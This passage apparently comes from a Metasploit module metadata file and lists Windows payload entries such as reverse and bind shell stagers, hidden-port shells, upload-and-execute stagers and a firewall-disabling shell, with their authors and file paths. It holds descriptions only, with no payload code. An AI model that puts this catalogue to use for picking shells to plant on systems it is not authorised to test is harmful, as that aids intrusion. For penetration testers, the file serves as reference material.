}
},
"payload_windows/shell/bind_hidden_ipknock_tcp": {
"name": "Windows Command Shell, Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/shell/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_hidden_tcp": {
"name": "Windows Command Shell, Hidden Bind TCP Stager",
"full_name": "payload/windows/shell/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_ipv6_tcp": {
"name": "Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/shell/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_ipv6_tcp_uuid": {
"name": "Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/shell/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_named_pipe": {
"name": "Windows Command Shell, Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/shell/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Spawn a piped command shell (staged). Listen for a pipe connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_nonx_tcp": {
"name": "Windows Command Shell, Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/shell/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Spawn a piped command shell (staged). Listen for a connection (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_tcp": {
"name": "Windows Command Shell, Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Listen for a connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/bind_tcp_rc4": {
"name": "Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/shell/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Spawn a piped command shell (staged). Listen for a connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/shell/bind_tcp_uuid": {
"name": "Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/shell/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/shell/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/find_tag": {
"name": "Windows Command Shell, Find Tag Ordinal Stager",
"full_name": "payload/windows/shell/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Use an established connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/shell/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_ipv6_tcp": {
"name": "Windows Command Shell, Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/shell/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker over IPv6",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_nonx_tcp": {
"name": "Windows Command Shell, Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/shell/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_ord_tcp": {
"name": "Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/shell/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_tcp": {
"name": "Windows Command Shell, Reverse TCP Stager",
"full_name": "payload/windows/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_tcp_allports": {
"name": "Windows Command Shell, Reverse All-Port TCP Stager",
"full_name": "payload/windows/shell/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_tcp_dns": {
"name": "Windows Command Shell, Reverse TCP Stager (DNS)",
"full_name": "payload/windows/shell/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"RageLtMan"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_tcp_rc4": {
"name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/shell/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/shell/reverse_tcp_rc4_dns": {
"name": "Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/shell/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/shell/reverse_tcp_uuid": {
"name": "Windows Command Shell, Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/shell/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell/reverse_udp": {
"name": "Windows Command Shell, Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/shell/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"spoonm <spoonm@no$email.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/shell/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell_bind_tcp": {
"name": "Windows Command Shell, Bind TCP Inline",
"full_name": "payload/windows/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell_bind_tcp_xpfw": {
"name": "Windows Disable Windows ICF, Command Shell, Bind TCP Inline",
"full_name": "payload/windows/shell_bind_tcp_xpfw",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Lin0xx <lin0xx@metasploit.com>"
],
"description": "Disable the Windows ICF, then listen for a connection and spawn a command shell",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb",
"is_install_path": true,
"ref_name": "windows/shell_bind_tcp_xpfw",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell_hidden_bind_tcp": {
"name": "Windows Command Shell, Hidden Bind TCP Inline",
"full_name": "payload/windows/shell_hidden_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sd",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Listen for a connection from a certain IP and spawn a command shell.\n The shellcode will reply with a RST packet if the connection is not\n coming from the IP defined in AHOST. This way the port will appear\n as \"closed\", helping us to hide the shellcode.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell_hidden_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/shell_reverse_tcp": {
"name": "Windows Command Shell, Reverse TCP Inline",
"full_name": "payload/windows/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/speak_pwned": {
"name": "Windows Speech API - Say \"You Got Pwned!\"",
"full_name": "payload/windows/speak_pwned",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Berend-Jan \"SkyLined\" Wever <berendjanwever@gmail.com>"
],
"description": "Causes the target to say \"You Got Pwned\" via the Windows Speech API",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/speak_pwned.rb",
"is_install_path": true,
"ref_name": "windows/speak_pwned",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_hidden_ipknock_tcp": {
"name": "Windows Upload/Execute, Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/upexec/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you can get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_hidden_tcp": {
"name": "Windows Upload/Execute, Hidden Bind TCP Stager",
"full_name": "payload/windows/upexec/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_ipv6_tcp": {
"name": "Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/upexec/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_ipv6_tcp_uuid": {
"name": "Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/upexec/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"OJ Reeves"
],
"description": "Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_named_pipe": {
"name": "Windows Upload/Execute, Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/upexec/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Uploads an executable and runs it (staged). Listen for a pipe connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_nonx_tcp": {
"name": "Windows Upload/Execute, Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/upexec/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_tcp": {
"name": "Windows Upload/Execute, Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/upexec/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/bind_tcp_rc4": {
"name": "Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/upexec/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"RageLtMan"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/upexec/bind_tcp_uuid": {
"name": "Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/upexec/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Uploads an executable and runs it (staged). Listen for a connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/upexec/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/find_tag": {
"name": "Windows Upload/Execute, Find Tag Ordinal Stager",
"full_name": "payload/windows/upexec/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Use an established connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/upexec/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/upexec/reverse_ipv6_tcp": {
"name": "Windows Upload/Execute, Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/upexec/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "Uploads an executable and runs it (staged). Connect back to the attacker over IPv6",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
